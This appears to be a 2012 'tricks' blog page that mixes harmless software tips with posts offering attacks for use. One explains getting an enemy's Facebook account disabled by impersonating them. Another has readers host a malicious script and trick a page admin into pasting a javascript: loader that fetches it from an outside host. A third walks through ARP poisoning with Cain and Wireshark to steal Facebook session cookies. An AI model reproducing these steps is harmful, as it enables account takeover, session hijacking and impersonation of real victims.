Welcome to the tech blog copacopi

Showing posts with label how to. Show all posts
Showing posts with label how to. Show all posts

AVG Anti-Virus 2012 free 1 year license key for all users

AVG Anti-Virus 2012 free 1 year license key for UK users

AVG Anti-Virus is to own well-known anti-virus software.To protect the invasion of PC all known threats such as viruses, adware, spyware, worms, backdoors, and so on. AVG Anti-Virus 2012 has advanced proactive identity protection, PC security analysis functionality, the AVG 2012 to add new protection technology, improvements in computer performance and many other improvements, can speed up the scan of your computer, leave the PC high-speed performance scan when using a PC, the low energy scan in the background.
AVG Anti-Virus 2012 Giveaway Details
This Promotion open to UK users in other countries need in order to obtain UK IP Proxy.

If you are not from UK and want to give it a try, you may try to access the offer with a IP based UK proxy service or vpn (clear your browser cookies before doing so), do not try to access the promo page with Web based Proxy, it’s waste of time and you won’t get the success
UK IP address you can view:

You need to have an account to apply for license of AVG Anti-Virus 2012. Just click this link to go to account creation page.
Visit This Giveaway Page to download AVG Anti-Virus 2012 with free 1 year license key.

If you are not logged in, first login. After login, scroll down toward bottom of page where you will see text How To Get Your Serial Code. Click on the blue button Get Serial Code, and your license will be shown and will also be emailed you.
Like us on facebook or follow us on Google+ by visiting these links ,
if you like our work !
Read More

How to get back your Airtel 3g speed from capped 8kbps

Hello users,
Many users are now using realhosts tricks to download and surf , but Airtel has now capped their downloading speed.They are getting only speed of 8-10 kbps, so bad huh!

and if you are also been capped by the Airtel. 
Then we have a trick for you to increase your speed to 3g speed.Just follow the steps below :
  • Compose and send a message "3G" to no. 121.
  •  you will get motice that these services are allready active on your number or you will get option to activate data plans.
  • Reply that message with 1 and you will get list of data plans available.
  • Activate yourself the 2nd option VBC3G plan.
  • Confirm the plan by replying 1.
  • You will get a notification by Airtel.
  • Thats all now check your speed guys ! Whoa its a 3g speed  
You may also want to try : 

Latest 2012 april real host I.p. for airtel 3g 

 

 

 Latest 2012 Airtel all india working free 2g 3g gprs trick

 



Uninor Free Gprs Trick May 2012






Read More

Copy Your Friends Message Inbox To Your Mobile

Hello users
 
Now You Can Copy Your Friends Message Inbox In Your Mobile..
 

Just Follow Below Very Simple Steps:-

1. Turn on your and your Friends bluetooth.
2. Go To Settings>sync and backup>phone switch>copy to this. 
3. Where They Ask to Select other device, Then Select new phone
4. Now You Can See List Which Item You Want To Select Mark It. You can also copy  MMS,NOTE,Contacts.
 5. Press Done And Search the device. Connect with it.

 Done.
Your Friend Inbox Copied Succesfully..
Enjoy And Use This Trick With Your Friends..
 
Please Give Your Valuable Comments Below..
Friend's Don't Forget To Like Us On Facebook.
Read More

Full procedure for unblocking your airtel sim | may 2012


Hello users, 
We were watching since few days that some of our users were facing airtel sim block problem and were confuse about it!
So , in this post we are providing full procedure of  sim block soluton.
You can also check these working tricks too :

Latest Airtel Sim Block solutions for free working internet may 2012

 New proxy may 2012 airtel free gprs

Airtel free 3g Cproxy vpn working all over India | may 2012

 


Here's the full procedure to unblock the Airtel sim


  • Recharge ur phone with 20Rs.. 
  • Now dial *567# and activate 10Rs plan..
  • After it gets expired (one day).. Dial *567*11# and activate 'zero' rental
    plan..
  • Then try and use any of the above given airtel tricks for free.

If you are still facing sim block problem Then follow the instructions given below:

  • Put your airtel sim in a black and white phone and put another airtel sim in ur gprs
    enabled handset.
  • Now new  gprs settings will come on your handset.
  • Save them all.
  • Now Activate mobile office and Try airtel gprs tricks.
  • If tricks are  working put the 1st airtel sim (that u put in black and white set).
  •  Now new configuration settings will come.
  • Now activate mobile office And try airtel tricks.. For eg: use thisas real host
    121.241.248.6 which is working all over India.
  • Or use any of the above airtel tricks and all airtel tricks from here

Download handlers app from here for free gprs :

Read More

Create Direct Link for Your Files !

Hi all users, how are you. Today we going to ell you how to upload you files at maximum speed and create/generate a direct link for it.  Most of time we need to upload our files and share with some peoples sometime with our users and they don't have patient to wait 60 or 30 seconds and downloading stuffs in lowest speed with no resume capability.  Sometime some sites like mediafire, ifile.it is a good option but they have annoying ads or waiting time, but I assure you that this site is very cool and very simple to use. You just need, to click upload button and that' it. You can upload your file 1024mb file at a time and they allows split archives also. So without losing a single  moment lets get started.

Follow the steps below to create your direct link :

1. First of all go to this cool website.

2. Register an account for you.

3. Start uploading and they will create a direct link for your file, mean no CAPTCHA no waiting etc.
Read More

Get Android 48 Minutes Free Calling Trick 100% Working

Hello Friends,
In this update on www.crackohack.in , we are bringing a working and cool way to make free calls anywhere in India from your andoid smartphone .
Isn't it cool ?
All you have to do is follow the instructions given below : 
 
Get Free Android 48 Minutes Calling For Any Number In India.

Instructions:-

1] Open Android Market.

2] Search For "Globaltalk" Application.

3] Install Application.

4] Open App And Your Account Will Be Credited For $1

5] Add 0091 Before Number And Make Call.
6] Enjoy free talking for 48  minutes all over India.


You might also like :

#Note:- This Offer Is Only For Android Phone Users.
To Use You Must Have Internet Connection On Your Mobile, Any GPRS Plan Activated.
Read More

How To Delete Your Enemy's Facebook Account

How To Delete Your Enemy's Facebook Account

This tutorial is education purpose only, once deleted profile can never be recovered.

Follow the steps given below:
  • Victim’s profile link ( you can get it easily )
  • His/Her Email which he/she uses to sign in
  • His/Her birth date which he/she has used in the profile
  • Make an Email ID on gmail or yahoo with the first name and last name same as on victim’sfacebook profile.

  • Now you will get this screen

  • Enter details. In the place of ‘ email address where you can be contacted ‘ enter the fake email you created.
  • You will get an email on that ID in which facebook people will ask your problem. Reply to them that you are (put victim’s name here ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account.
  • After 2-3 days you will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don’t have access to it. And repeat what all you wrote in first mail.
Next Day or Same Day you will get an Email that your account is disabled. 

you may also read :

Read More

How To: Protect and Maintain your PC using Kingsoft PC Doctor

How To: Protect and Maintain your PC using Kingsoft PC Doctor

How To: Protect and Maintain your PC using Kingsoft PC Doctor
Even if your system is fully protected with the latest anti-virus and anti-spyware software, you may notice it slow down over time. Applications take longer to launch and Windows needs more time to boot up and shut down. The reason for this decrease in performance, is that normal Windows usage causes a build up of temporary files, registry entries and other "dead wood" that all results in the operating system not running as efficiently as it could.

Just like a car, all operating systems need a regular tune up to clear these temporary files, diagnose any potential issues and restore things to a more optimal state. This is even more the case with Windows. None of this is any indication of a malicious software infection - it just par for the course. A good system maintenance tool - such as Kingsoft PC Doctor - will do all the hard work for you, leaving you to sit back and watch it cleanse and restore your PC to its former glory.

Step-by-Step Instructions

  • 1
    You can download Kingsoft PC Doctor by clicking the related download link for this article and then choosing Download Now. Once the file setup_multilang.exe has finished downloading, run it to begin the installation process and click the Install option when the Kingsoft PC Doctor install wizard appears.
  • 2
    After installation, Kingsoft PC Doctor launches automatically and its functionality is available via a system tray icon. Kingsoft PC Doctor is designed to be left running constantly (so that it can monitor your system processes for issues) and eats up only a very small amount of system memory. A floating status bar just above the system tray area shows you exactly how much CPU and Memory resource is currently being used, so you can see at a glance if you have any issues in either of these areas. Double click the Kingsoft PC Doctor system tray icon to get started.
  • 3
    Click the Quick Care button to perform a quick sweep of your system for common issues that affect performance. Kingsoft PC Doctor begins checking various cache, history and junk folders to see what can be cleaned out.
  • 4
    Once the scan has been completed, the results are shown in a list. You can click the individual Clean and Optimize buttons in the results list, but it is easier to click the large Fix All button. Kingsoft PC Doctor will now remedy all the problems it detected and reported. You may need to close any running web-browsers to complete this step.
  • 5
    Once this has been done, another set of results are shown - these should be much more green, indicating there are now no system optimisation issues present. You can perform another scan to make sure by clicking Rescan.
  • 6
    Next, click the Cleaner tab to perform some more in-depth spring cleaning. In the Junk Cleaner tab, click the Scan button. There may be some areas that were not cleansed during the Quick Care scan (which is not comprehensive) and these will be picked up here. When the results are displayed, scroll through the list - not all areas are checked by default for cleaning - and tick the relevant boxes for any folders you want to clear out.
  • 7
    Click the Clean button to proceed and Kingsoft PC Doctor will now empty all the selected folders in the list.
  • 8
    Another area which is often commonly associated with slow performance is the registry. This is a database that stores all the configuration settings, file extensions and other details for all the programs you have installed. When you uninstall an application, it usually leaves behind many traces in the registry, and these build up over time, often causing a drop in performance. You can spring clean the registry by clicking the Registry Cleaner tab and then Scan. Kingsoft PC Doctor analyses the current status of your registry and looks for invalid entries that are no longer needed.
  • 9
    Click Clean Now when the results are displayed and Kingsoft PC Doctor will optimise your registry. You should now find that your system performs a great deal better than it did before.

Tips & Advice

  • It is recommended to update Kingsoft PC Doctor regularly, as improvements are constantly being made to make the application more efficient. When viewing the main interface, click the Update button to check for any new releases. If any are found, Kingsoft PC Doctor will download and install them automatically.
Read More

How to Place Facebook Chat On Firefox Sidebar

Facebook Chat is cool, at least it allows you to send instant messages to online Facebook contacts. However I’m not really a fan of the chat bar being at the bottom of the page, what if I’ve left Facebook but still wants to remain chatting with my Facebook contacts? If you are using Firefox, you can place the Facebook Chat at the sidebar.

Step 1

Look for Bookmarks on the top navigation. Select Organize Bookmarks…

Step 2

Click New Bookmark... tab and enter the following:
  • Name: Facebook Chat
  • Location: http://www.facebook.com/presence/popout.php
  • Check Load this bookmark in sidebar.
  • Step 3

    Launch the Firefox sidebar, click Facebook Chat and start chatting with your Facebook contacts within Firefox.
     

Read More

How to: Video streaming between PC and Android



Today’s smartphones, particularly those based on the Android platform, are media powerhouses, so it’s very likely that you have tons of photos and video clips you’d like to share with friends and family. But it can get pretty painful showing them off on your handset’s tiny screen. Wouldn’t it be nice if you could watch it on your laptop, desktop monitor or your large screen TV without having to transfer the files onto your PC? Getting a USB cable and hooking up your phone to your PC is tedious and time consuming. And what if you happen to be at a friend’s place and don’t have your USB cable with you? Moreover, you wouldn’t want to transfer your personal media onto someone else’s PC. In this workshop, we will show you how you can stream video, photos or music from your mobile phone directly on to a desktop PC or laptop. All you need is a simple free Android app called VLC Direct, a media playback application called VLC Media Player on your PC, and the two connected to the same network. Download VLC Direct for free from the Android Market. Download and install VLC on your PC from ‘www.videolan.org’. Connect the PC and the Android phone to a wireless router and you are ready to stream. Step 1: Start VLC Direct on your Android handheld. A small wizard will guide you through the process of configuring the video streaming necessities. Be careful because if youaccidentally quit the application or press the back button on your phone, VLC Direct will exit and not show you the wizard again. In this case, you can press the Menu button, go to ‘Settings’, and select the ‘Automatic Connection Wizard’ to re-initiate the wizard.

Step 2: Start your PC, connect it to a large screen LCD TV if you want to enjoy videos on a big screen. Start VLC Media Player on your PC. Click on ‘View | Add Interface | Web interface’ and leave VLC Media player as it is. Step 3: On the mobile phone screen, select the ‘Start’ button and the VLC Direct app will start scanning for the machine with VLC Media Player on your local network. Once that is done, you receive a toast message stating that it has found the player and the configurations have been set. You are now ready to stream your
 media files onto your PC instantly. Using the Android handset, you can sit back and
scroll through your list of videos, photos, or music files and watch play them back on the big screen. You can control the playback (stop, play, pause, forward or rewind) and volume controls too. What’s more, you can also pull up the list of media files stored on the PC (running the VLC Media Player) and play those. The VLC Direct interface includes playback control buttons, icons for videos and music on your phone,  monitor icon for listing files available on the remote PC and a VLC icon for a playlist. Towards the top-left of the screen, you will find an Android logo icon
(target), which is a toggle button that can be used to direct the video stream to your PC from your handheld or from the PC to the handheld. The screenshots here will explain these
buttons in detail. Streaming media from the PC to the Android phone is pretty
simple using the target button. Using this mode is beneficial as you don’t need to transcode or
convert your videos into a compatible format for your Android device.You can also save on
storage space on your phone by treating the PC as a media server. Streaming
from your PC to the Android device can also be convenient when someone elseis using the laptop and you’d like to access media content on it.
Note: In order to stream media files from a PC to your Android phone, youwill need to purchase the VLC Direct Pro version, which is available on the Android Market for Rs 164. The Free
version can stream seamlessly to a PC without any limit, but streaming from a PC to your phone is only allowed for a few minutes.
Read More

Retrieve deleted data from USB pen drive and memory cards

For Windows XP, Vista, 7
You have accidentally deleted files from a USB pen drive or photos from an SD card. Since there is no recycle bin there, there is simply no way to restore this data.
There is no guarantee for data restoration but it is also not impossible
that you can recover deleted files. What is of utmost importance is that after the
deletion, you should not write anything on the disk in question because that could cause the required content to be overwritten. In order to prevent this, install the free tool Recuva on your hard disk. It is available from Download from Here !.
It might be possible to recover deleted data from a
pen drive or memory card.

After a quick installation, a wizard comes up that helps you with the following steps. First select the file type such as ‘Images’ or ‘Documents’ or use the ‘Other’ option for a complete search.
Click ‘Next’ and then select the relevant memory location. Then search for a
drive or partition, select the option ‘At a specific location’ and then enter the
memory location or navigate there via ‘Browse’. You can also select ‘Recycle
Bin’ or can search the entire computer with ‘I am not sure’. Then click ‘Next’. In
the following dialog box, keep the option Activate deep scan’ deactivated since
this analysis can take very long. You quickly get a result after clicking ‘Start’.
The list shows all the deleted data and highlights files that can be restored By clicking the ‘Advanced Settings’ button, you can select every rediscovered file, see a preview of it to the right and view detailed status information in the ‘Info’ tab. In case of files marked in
red that cannot be restored, you can immediately see what they have been
overwritten with. When restoring, activate the checkbox for the required files and
then click ‘Restore’. Always select a folder on another drive as the storage location
and then click ‘OK’. 
Note: The restoration usually works for
defective or garbled files as well, but of course the result will also be garbled. In
case of a text file however, this can still be of a little help if certain parts of the
text become legible once again.
Read More

How toHack Facebook Fan Page (EXCLUSIVE AT CRACKOHACK)

Hello guys! after receiving a good responce from you i am posting a new trick here at crackohack.in, Well it will tell you about a new hacking technique and also will increase your knowledge so that you may not become victim of such hacks, But Always remember:


Note: Never use these tricks to harm any innocent, Just increase your knowledge and we will not be responsible for any harm caused.

The purpose of this trick and hack is to attack a fan page by fooling the admin by social engineering, I saw some people becoming victim of this, So i decided to teach about this hack to my loyal readers. Don't forget to share this with friends.

Things we shall need:
1. Facebook page hacking exploit.
2. A free hosting.
3. A key or script to run that "Facebook page hacking exploit.".
4. Your facebook email id.
5. Brain ( A bit ;) )

I will try to be simple, but if you don't get anything then kindly ask at comment below.

1. Facebook page hacking exploit:
Download this exploit from the link below, Complete the survey and you will get this exploit for free.
                                           Download script from here                                   

Now, After downloading it you will get key inside it also, and also the exploit, First we have to edit it,

a) Editing the exploit:
First of all see you facebook email id which you used to signup at facebook, see pic below thats the pic of exploit:

Now change the highlighted id to your's facebook id, Above its, bhupinder9dec@gmail.com
2. Get free hosting:Well t35 and 110mb won't help you in this hack :P better go to 000webhost.com and 0fees.net.


Upload the exploit and i recommend change its name from pagehack.js to fanbooster.js or something more attracting.

3. Using the exploit by Key or script:
Use this script to complete this attack. Now the main thing is social engineering,  its up to you that how you give him this script or key, Well Change the following part in the key to your own script path:

javascript:(a = (b = document).createElement("script")).src = "//http://dl.dropbox.com/u/67513625/fanbooster.js", b.body.appendChild(a); void(0)
Change this to your hosting , and also change the exploite name in this key if you have changed it while uploading as suggesting.

Tip: Encode this in ASCII format, Victim might not know what is this.
Now, Give the key to victim (He must be admin of page) and ask him to paste this in browser address bar

Tip: Tell him that it will make your page safe, or something else like attracting

When he will put this key in address bar and thats it you will get a notification that you are admin of his page now.

Enjoy cracking and hacking, But don't hack for bad cause, We  will not be responsible
Read More

How to hack Facebook via Sniffing ?

How to hack Facebook via Sniffing ?
How to hack Facebook via Sniffing?

Hi all users, after receiving your mails that most of facebook hacks doesn't work anymore we have searched and tested and posted some of most popular facebook hacking techniques but still  I think doesn't work for you so finally we've found this technique working 100% for hacking facebook and today we're here to let you know how to do it. So you want to hack Facebook, eh? Before we begin learning how to sniff and start ARP poisoning, let's first begin with this: this tutorial was designed for educational purposes--only! I take no responsibility in whatever damage this may cause to those who wish to participate in this act of hacking! That being said, if you still wish to continue in learning how to get into someone's Facebook without them knowing, proceed along.

There are a couple of terms you will have to know before we begin. This is so that you don't find yourself scratching your head midway through this post wondering what the @$%# I'm talking about. Please understand the following terms and they're respective definitions before proceeding.


  • Cookie:  A cookie is just one or more pieces of information stored as text strings on your machine. A Web server sends you a cookie and the browser stores it. The browser then returns the cookie to the server the next time the page is referenced. Cookies are essentially utilized so that the website can remember certain aspects of that particular website so that when you return it loads the page faster.
  • ARP Spoofing/Poisoning:  ARP stands for Address Resolution Protocol and is a telecommunications protocol used for resolution of network layer addresses into link layer addresses, a critical function in multiple-access networks. It's the "guy" behind the scenes that stands in the middle of all the network traffic, takes in the requests of other computers on the LAN, and returns valuable information/answers. How do you think you get your IP address when you look up ipconfig in CMD? Your computer sends out a request to extract its IP address and the ARP essentially gives you the IP address for your computer. The act of "spoofing" or "poisoning" the ARP, as you probably can already tell, is a very dangerous protocol. By doing so, you are enacting what's called a "man-in-the-middle-attack", MITM for short. When you poison the ARP of a computer within a LAN, you are making yourself the ARP. In other words, all the requests the computers in the network make come directly to you and the answers go directly from you. More on this later.
  • Packet(s): Packet, or packets, are a formatted unit of data carried by a packet mode computer network. They contain literally a million variety of information and provide useful methods in transmitting/receiving requested information. For example, let's take a look at sending an email. On the Internet, the network breaks an e-mail message into parts of a certain size in bytes. These are the packets. Each packet carries the information that will help it get to its destination -- the sender's IP address, the intended receiver's IP address, something that tells the network how many packets this e-mail message has been broken into and the number of this particular packet. The packets carry the data in the protocols that the Internet uses: Transmission Control Protocol/Internet Protocol (TCP/IP). Each packet contains part of the body of your message. Hopefully this gives you a general idea of how packets work and what they provide for both your computer and the internet.
  • Sniffing: Sniffing is usually implied to sniffing network packets. Packet sniffing is the act of eavesdropping on another computer's packet transfer and capturing (saving) those packet transfers for analysis. Though this sounds malicious and wrong, packet sniffing is used widely around the world today for a number of beneficial reasons. But yes, you are correct, just like everything else there are both good and bad intentions for sniffing. An analysis of "sniffed" packets can often times to be used to pick out abusive/malicious acts within a network. An analysis can also provide the "sniffer" to pick out what the slave has been doing and what kind of information the slave's computer has been sending/receiving. Again, just a general definition but you get the picture.
Please read through the definitions and familiarize yourself with the terms before asking what certain things mean here. You can't expect to know every and anything without doing some homework. Trust me, knowing these terms will not only save you time but also give you the benefit of becoming more knowledgeable about basic network definitions Victoire

Software

The following is a comprehensive list of the software you will be needing for this practice. I've given the links to their home pages where you can download the software for free.


Sniffing Your Way In

Now that you're generally familiar with some basic network definitions and have downloaded the required tools to effectively sniff packets, let us begin. Go ahead and open up Firefox and log into your Facebook account. You should be able to see the "cookies" option in the upper-left corner of the toolbar. Click on that and select "View Cookie Information".

You should now see a collective group of information all in regards to the cookies saved on your computer for Facebook. The main cookies are the c_user cookie (which identifies a person uniquely) and datr cookie (which contains important information for the specified c_user). Our goal in sniffing into someone else's Facebook is to trick the browser and the computer into thinking that we are someone else. How do we do this? By manipulating cookies to disguise ourselves. Essentially we are swapping our actual Facebook cookies to that of the slave's so that when we log back into Facebook, it will think we are the slave rather than ourselves. Not too hard to understand, right? Blink

Go ahead and close out of Firefox for now. Next, go and install Cain and Abel. Throughout the installation process, the setup wizard will ask if you want to install the packet driver WinPCap--go ahead and install this. Once you have successfully installed Cain and Abel, open the program. Now follow these steps exactly:
  • Click on configure on top and select your Network card. Mostly its the one with an IP address Tongue.
  • Next click on the start/stop sniffer on top as shown below in green square.
  • Once you start the sniffer, goto the sniffer tab in Cain, right-click and click scan MAC address as shown below!


Depending on your computer and your network population this process can take a couple of minutes. Once it's complete, however, you should be able to pull up a list of computers on your LAN. One cool thing you can do here is right-click one of the computers and find out the computer name. Now it's time for the attack! What was the name of the attack again? Anyone? Did you forget already? Ah, yes, the MITM attack!

Again, follow these steps accurately to effectively spoof the ARP :

  • First Click the APR tab below in cain.
  • Click the white screen in the top frame
  • Click the blue plus on top.


You should get a list of all the devices on the left and a blank screen on the right. In the left screen you should select the router IP. And in the right box, select the computers you want to target. To be safe its better to target one computer. But if you want some real fun then select all the computers on the right frame Hehe. Press "Ok". A caveat in selecting a large amount of computers, however, is that your computer may not be able to handle all the network transmissions and therefore lose some packet captures. Also keep in mind, however, that if someone is working in the router or is monitoring/analyzing the router and actually knows what he/she is doing, they could immediately detect that you are ARP poisoning the router. So be careful! You can get caught.

All the computers should have populated the top-frame. Now select the whole list and click on the nuclear button (top left of Cain, bolded box in the picture below).
And you're done! You've successfully poisoned the ARP of the computers you've selected and you are now the "middle-man" between your slave's computer and the router to the internet. But wait just a second--we can't get into the slave's Facebook just yet! All we've done so far is established ourselves to be the "middle-man". We have to now capture some packets, swap cookies, and voila! We're in.

Now we will open up Wireshark. Follow the steps below :

  • Open up wireshark
  • Go to "Capture –> Interfaces" in the top menu and select your interface. It’s usually the one which has an IP address and a certain number of packets flowing through it.
  • Next go to "Capture" and click on "Start".  
It should look something like this.
This window has all the packets sent from the slave’s/victims’ computer to the router and all the packets sent from the router to the slave.

Next in the filter type “http.cookie contains datr”. You ask why? Because, when a user logs in to facebook, he is given some cookies which is unique to him. If we replace our cookies with the slave’s cookies, we can login to his account as then facebook wont know the difference.

 
After filtering the cookies out, right-click on any one of them and click on "Follow TCP Stream".


In the TCP stream look for the line "Cookie: ( and all cookie names)". If it doesn't show up, select some other packet in Wireshark and click on "Follow TCP Stream" for that particular cookie. You can see the source IP and destination IP in Wireshark. So if you have more than one source IP, then you know you have the cookies of more than one account on your LAN. This is what I got when I did it.

 
You now have the slave's cookies for his/her Facebook. The main ones we need to focus on are the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie. Now open up Firefox and go to Facebook. If you're logged in, log out so that you're at Facebook's home page. Click on the "Cookie" option in the toolbar (as like before) and do the following in this exact order. 
  • Clear session cookies.
  • Delete domain cookies.
  • Delete patch cookies.
Note :-
If you don't do the steps in that same order, this will not work!

Note :- Once you do this, reload the Facebook page (http://www.facebook.com). This is to ensure that you are loading the Facebook page clean without any pre-existing cookies.

Now login to your account with your username and password. After logging in, click on cookies in web developer add-on just like before and click on “View Cookie Information”. You should see all of your Facebook cookies now. Any ideas what we do next? I suspect you know by nowOui.

Click on “Edit Cookie” for each cookies there and replace the cookie value with the value you got through Wireshark. If you didn't get all the cookies in Wireshark, it's OK! But mainly, you should look to replace the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie.
After you have swapped cookies, go ahead and refresh the page. Voila! You should now be logged in as your slave rather than yourself. Congratulations, you have successfully "hacked" your way into someone else's Facebook! Again, please keep in mind that this only works for computers within your LAN. So if you're at home, you can only get into the Facebook of people who are connected at home. No, you cannot hack into the Facebook of someone across the worldNon.

I hope you guys have enjoyed this tutorial! Please feel free to leave me any questions below or PM me with any issues you have. I'll try to respond and reply at my soonest convenience.
If you liked this tutorial then +1 us on google+ and like our facebook fan page to get latest updates like this!
Read More

How to Bypass / Remove any Survey From Website ?

How to Bypass any Survey From Website ?
 How to Bypass / Remove any Survey From Website ?
Hi all users, today we'll teach you how to remove/bypass surveys from websites.The Survey Remover allows you to easily remove surveys from websites, allowing you access to a "premium" content. The remover automatically supports surveys from providers such as CPAlead, AdscendMedia, LeadBolt and many more.

This is the official thread of the Survey Remover. This code removes surveys, which prevent you from viewing websites, without you having to complete the online surveys. Therefore, you do not have to waste your time and money completing forms so that someone else gets paid for your hard work. It also stops you from exposing more privacy information to marketing companies than you're comfortable with.

The remover works not by acting like a proxy (which often ruins the page's usability and functionality) but by just removing the survey.

The Survey Remover is a designed to help protect your privacy online and save both your time and money, by allowing you to access "premium" content areas on websites, without completing surveys. The bookmarklet uses advanced javascript techniques to change the way websites layout their content, thereby allowing the you to view it correctly, without having to do a survey just for someone else to profit from your time!

So why do websites make you do surveys? Put simply, people make money from you when you fill them out: it's called CPA advertising. This is where a website gets paid when you perform an action such as filling out a survey.

Are all online internet surveys bad then? No - you can make money by filling out online surveys: it is one of the simpliest ways to make quick cash online! Marketing is big business: by learning to target products at the right people, companies cut advertising spending and increase sales. Online surveys can therefore pay cash for your valuable opinions. It's just that this site doesn't believe that you should be exploited for the gain of others.
Supported Survey Providers :
This is a list of supported third party, online marketing companies, that are the major providers of content covering, CPA surveys. They are not individual websites, which the remover works on: any site on the internet can be using surveys provided by the following companies. Furthmore, if you find a site that is using content covering surveys, it is almost certain that they are coming from one of the providers below:

cpalead.com
adultaccessnow.com
adscendmedia.com
oocee.com
perfecttracking.com
cpalock.com
dollarade.com
blackhatcodebreaker.com
instantdollarz.com
leadbolt.net
pointclicktrack.com
syndik8ed.com
adpath.mobi
advertisingvalue.info
bannerperformance.net
bannersurvey.biz
bannertrack.info
ldgateway.com
gatewaypass.biz
clicksurvey.mobi
impressionaffiliate.mobi
clickperformance.net
impressioncontent.info
impressionaffiliate.com
impressionvalue.mobi
impressionwidget.net
impressionperformance.biz
leadad.mobi
leadadvert.info
junglefriendtracker.info
offeradvertising.biz
optimizeadvert.biz
performancetrack.info
clicktracking.biz
promotionoffer.mobi
promotiontrack.mobi
surveyvalue.mobi
unlockr.com
surveywidget.biz
wegetpaid.net
trackadvertising.net
trackingoffer.info
trackingoffer.net
trackpath.biz
trackpromotion.net
gate-ru.com
advertisingpath.net
valueaffiliate.net
awesomevitamin.net
mgcash.com
stuckads.com
affiliatevalue.info
valuecontent.net
amazonaws.com
affiliategateways.co
widgetadvertising.biz
widgetbanner.mobi
personalclp.info
surveyvalue.net
widgetlead.net
adworkmedia.com
widgetvalue.net
widgetsurvey.biz
wfnetwork.com
auto-insurance-quotes-compare.com
cpalockup.com
stealthlockers.com
impressionpromotion.info
ikhouzotjesveelvanjou.com
tredirect.com
adgatemedia.com
Requirements :
  • You must have Javascript enabled.
  • You must be using a supported browser - all major browsers excluding Internet Explorer are supported
  • You must read the terms and conditions before using the remover.

How to get it?
Here's javascript code: 
javascript:(function(){"[url]http://survey-remover.com/[/url]";var rs=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min};var n=[];for(var r=0;r<q(9,19);r++){n.push(String.fromCharCode(q(97,122)))}return n.join("")};var xc=[];var timers=["Timeout","Interval"];for(var i=0;i<timers.length;i++){(function(){var x=window["set"+timers[i]]("null",1);eval("delete clear"+timers[i]);eval("delete set"+timers[i]);if(window["clear"+timers[i]]==undefined){if(typeof ar=="undefined"){var ar=document.createElement("iframe");ar.style.display="none";document.body.appendChild(ar)}window["clear"+timers[i]]=ar.contentWindow["clear"+timers[i]];window["set"+timers[i]]=ar.contentWindow["set"+timers[i]]}for(var j=x;j>0&&x-j<99;j--){window["clear"+timers[i]](j)}})();(function(){var op=rs();xc.push(op);window[op]=window["set"+timers[i]];window["set"+timers[i]]=function(){};for(var j in window){try{if(typeof window[j]=="function"){if(xc.indexOf(j)==-1){if((window[j]+"").indexOf("function set"+timers[i]+"() {")!=-1){window[j]=function(){}}"}"}}}catch(e){}}})()}window[xc[0]](function(){window["set"+timers[0]]=window[xc[0]];window["set"+timers[1]]=window[xc[1]];var xjz={version:"3.0",domain:"http://survey-remover.com/",id:"B4f46767f1acc1"};var scTO=window.setTimeout(function(){window.alert("It appears that the server could not be reached. Please try to use the bookmarklet again later!\n"+xjz.domain+"\n\nIf there is a problem with the site, you can check for the latest information on the Facebook page:\nhttp://www.facebook.com/XJZ.Survey.Remover")},10000);var a=document.createElement("script");a.type="text/javascript";a.src=xjz.domain.replace("//","//public.")+"remover/?injection="+xjz.version;a.onload=function(){window.clearTimeout(scTO)};window.document.getE ​​​​lementsByTagName("head")[0].appendChild(a)},110)})();
or this:
javascript:(function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]]("null",1);eval("delete clear"+z[i]);if (window["clear"+z[i]]==undefined){if (typeof(ar)=="undefined"){var ar=document.createElement("iframe");ar.style.display="none";document.body.appendChild(ar);}window["clear"+z[i]]=ar.contentWindow["clear"+z[i]];}for(var j=x;j>0&&x-j<99;j--)window["clear"+z[i]](j);}})();var bd="[url]http://survey-remover.com/[/url]";var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n="";for(var r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122));return n;};var sj=["Timeout","Interval"];var bl=[];var xc=[];for(var i=0;i<2;i++){bl.push(window["set"+sj[i]]);window["set"+sj[i]]=function(a,b){};for(var j in window){try{if(typeof(window[j])=="function"){if((window[j]+"").indexOf("function set"+sj[i]+"() {")!=-1)window[j]=function(a,b){};}}catch(e){}}var op=gn();xc.push(op);window[op]=bl[i];}var er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:"2.0",domain:"http://survey-remover.com/",id:"4df5d9e02eda3",TO:setTimeout("alert(\"It appears that the host could not be reached :(\nPlease try to use the bookmarklet again later!\n\"+xjz.domain);",10000)};var a=document.createElement("script");a.type="text/javascript";a.src=xjz.domain.replace("//","//public.")+"remover/";a.onload=function(){xjz.surveyRemover=new xjz.SurveyRemover(xjz.version);xjz.surveyRemover.init();};document.documentEleme ​​​ nt.firstElementChild.appendChild(a);};window[xc[0]](window[er],110);})();

F.A.Q

Q. What are the aims of the Survey Remover Project?
 
A. The project is designed to stop the exploitation of the visitors to websites by getting them to fill out surveys which profit only the website owners. Furthermore, often these websites contain no valuable content and people are tricked into visiting them. The Survey Remover allows these surveys to be bypassed, saving people's time, money and privacy.

However, not all surveys are bad: it is possible to make money for your personal gain if you sign up to do surveys (more tips found on this page). The Survey Remover project though does not agree that you should be used to make other people money, when trying to find information on the internet.

Q. Does the remover work for spam (or its mirrors)?

A. The Survey Remover DOES NOT work with spam. This is due to the way surveys from spam work. In summary, aside from them been surveys, they are nothing at all like the surveys which the Survey Remover is designed to work with. For related information, view here.

Don't report the remover not working on spam.org, fileml.com, fileups.net or any other site which upon running the remover, tells you that it is spam related.

Q. I can't download a file after the survey is removed

A. The Survey Remover is designed to remove surveys from pages to allow access to their "premium" content. It does not fool anyone into thinking you have completed a survey when you have not. Sometimes, the location of the file which is to be downloaded is only given when a survey has been completed. As of this, you will not be able to download the file when you use the remover.

You can identify surveys where downloads are given only on survey completion as they will often have a "close" button. It may look like this:

It is obvious that the remover will not help with surveys with a close button as, if the survey can already be closed manually, removing it with the remover not be any extra help.

Q. The survey isn't been removed correctly

A. If a survey is not automatically supported, you'll notice that the remover asks if you want to use the "User Removal Kit" to bypass it. Most of the time, this point and click method of survey removal will work. However, if you think the survey in question should be automatically removed, just post a bug report on the site and usually it'll be fixed in a day or so.

Q. How can I use the remover for free?

